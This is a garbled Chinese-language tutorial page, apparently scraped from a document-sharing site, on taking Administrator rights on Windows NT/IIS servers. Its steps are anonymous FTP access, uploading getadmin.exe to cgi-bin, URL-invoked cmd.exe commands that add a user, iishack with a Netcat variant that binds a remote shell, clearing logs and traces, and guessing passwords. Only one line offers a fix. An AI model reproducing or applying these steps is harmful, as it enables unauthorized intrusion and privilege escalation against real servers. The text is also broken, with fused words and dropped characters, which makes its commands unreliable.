操作windows nt的administrator权限

《操作windows nt的administrator权限》由会员上传分享，免费在线阅读，更多相关内容在工程资料-天天文库。

1、操作WindowsNT的Administrator权限一、通过修改注册表凡是具有登录NT本机的用户，例如IUSR_machine，都具有对HKEY_LOCAL_MACHINESOFTICROSOFTACHINESOFTicrosofticrosoftFTPService(Version3.0).Ntsvr2这个东西暴露了其bios名，那么在IIS的背景下，必然会有一个IUSR_ntsvr2的用户帐号，属于Domainuser组，这个帐号我们以后要用来获取Administrator的权限。User(.xxx.:(none)):anonymousPassainguest组。在这种情况

2、下我们就可以进NTserver的ftp了。进去以后，看看目录列表，试试cd/scripts或cgi-bin等关键目录，如果运气好，改变目录成功，这时你就有了80%的把握。把d.execopy到cgi-bin，把getadmin和gasys.dll传上去到cgi-bin，然后输入：cgi-bin/getadmin.exe?IUSR_ntsvr2大约十多秒后屏幕显示：CGIError这时有90%的可能是：你12下一页——感谢阅读这篇文章，..，已经把IUSR_ntsvr2升级为Administrator，也就是任何访问该d.exe?/c%20c:32et.exe%20user%20c

3、hina%20nein.exe?china或者scripts/tools/getadmin.exe?china你再用China的帐号登陆，就可以有最大的权限了，也可以用上面的cmd.exe的方法直接修改如果没有cmd.exe，也可以自己传一个上去到scripts/tools或者cgi-bin目录。第三个方法、用cat和iishack如果你熟悉使用Netcat这个工具，你就知道，cat可以利用NT的弱点在其上绑定端口，下面用eEye的工具已经介绍过，如果你熟悉Netcat，成功的可能性会更大。IIS的ISAPI的毛病(.HTR)我们再来看看eEye最近这两天发现的一个关于NT/II

4、S的问题和工具。在IIS的/Isrv目录下，有个DLL文件叫ism.dll，这个模块在，利用这个毛病，eEye写了两个程序：iishack.exencx99.exe为达目的你必须自己有一个ysvr.?而对方的IISserver是.xxx.则：iishack.xxx.80.mysvr.ncx99.exe??(注意，不要加thetrojan.exedonotinclude'bus.exencx99.exe实际上是有名的Netcat的变种，它把对方server的cmd.exe绑定到Tel服务。ncx.exe这是较早的版本，是把端口绑到80的，由于80端口跑,happybroin

5、utes]C:>[Addascheduledtasktodeletencx.exeinX-1minutes]C:>[Cleanupanytraceorlogsighthaveleftbehind.]这样，你就完全控制了其硬盘上的文件！注意，如果你typeexit退出，对方server上的这个进程也会退出。补救方法：在IIS的service属性中将主目录的应用程序设置的.htr的映射删除。其它：用Retina.exe得到NT域内的帐号清单，逐个尝试这些帐号，如果有的密码薄弱而被你猜出来，就可以用上面的方法来获取NT的Admin。331Anonymousaccessall

6、oailname)aspassword.上一页12——感谢阅读这篇文章，..，